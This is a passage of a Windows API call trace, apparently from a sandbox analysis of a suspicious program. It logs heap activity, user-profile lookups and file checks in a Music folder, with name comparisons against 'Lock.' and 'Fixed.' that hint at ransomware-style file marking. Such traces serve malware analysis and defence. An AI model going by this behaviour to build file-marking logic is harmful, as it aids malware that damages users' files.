hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0252.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.134] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0252.135] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.135] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0252.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", lpFilePart=0x8bf658*="HwKg28SMvdgN7pz7S.wav") returned 0x39 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0252.139] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hwkg28smvdgn7pz7s.wav")) returned 0xffffffff [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.139] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0252.139] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.139] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LVDYQUpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VDYQUpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DYQUpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQUpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QUpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UpAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pAZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZwEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wEha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ha.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.142] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LVDYQUpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VDYQUpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DYQUpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQUpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QUpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UpAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pAZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZwEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wEha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ha.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.143] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0252.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0252.143] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0252.143] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.144] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0252.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.145] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0252.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.146] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0f9410, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x6f26a9f0, ftLastAccessTime.dwHighDateTime=0x1d4c9b7, ftLastWriteTime.dwLowDateTime=0x6f26a9f0, ftLastWriteTime.dwHighDateTime=0x1d4c9b7, nFileSizeHigh=0x0, nFileSizeLow=0xa2ab, dwReserved0=0xe60530, dwReserved1=0xc67f, cFileName="LVDYQUpAZwEha.mp3", cAlternateFileName="LVDYQU~1.MP3")) returned 0xaa57a0 [0252.146] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.147] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.149] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 